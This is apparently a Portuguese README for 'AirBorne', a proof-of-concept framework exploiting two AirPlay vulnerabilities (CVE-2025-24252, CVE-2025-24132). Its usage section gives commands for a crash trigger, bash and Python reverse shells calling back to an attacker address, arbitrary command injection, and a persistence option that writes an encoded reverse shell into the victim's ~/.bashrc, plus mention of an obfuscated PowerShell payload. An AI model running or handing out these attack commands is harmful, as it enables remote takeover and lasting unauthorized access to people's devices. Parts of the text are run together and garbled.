
poc para CVE-2025-24252 & CVE-2025-24132
Framework PoC completo para CVE-2025-24252 e CVE-2025-24132
Por ekomsSavior |
AirBorne é um framework de prova de conceito (PoC) combinado que visa duas vulnerabilidades graves no serviço AirPlay da Apple. Ele inclui um gatilho de crash completo e um exploit de reverse shell funcional com persistência opcional, listener e múltiplos formatos de payload — tudo em um único script.
Procurando pela versão original?
A edição legada ainda está disponível no branchlegacydeste repositório.
Para fazer o checkout:
git checkout legacy
.bashrc (Linux)git clone https://github.com/ekomsSavior/AirBorne-PoC.git
cd AirBorne-PoC
sudo apt update
sudo apt install -y python3-scapy netcat
O único script airborne.py inclui ambos os PoCs e toda a lógica:
--exploit--payload--persistentsudo python3 airborne.py --exploit 24252 --interface wlan0
Requer uma interface em modo monitor.
Inicie o exploit completo com o shell bash padrão:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99
Escolha o shell Python em vez disso:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python
Ative a persistência real em alvos Linux:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent
Apenas injeção de comando shell
sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"
| Payload | Descrição |
|---|---|
bash | Reverse shell bash padrão via TCP |
python | Reverse shell baseado em Python usando socket e pty |
Ao usar --persistent, o script anexará o payload de reverse shell codificado ao arquivo do alvo:
~/.bashrc
Isso garante que um shell seja devolvido a você toda vez que o usuário fizer login ou um terminal for iniciado.
base64 e enviados após o estouro de buffer (buffer overflow)Este projeto destina-se apenas a fins educacionais, éticos e de pesquisa autorizada.
A exploração não autorizada de sistemas é ilegal e antiética.
powershell| Payload RCE completo em Windows PowerShell (ofuscado) |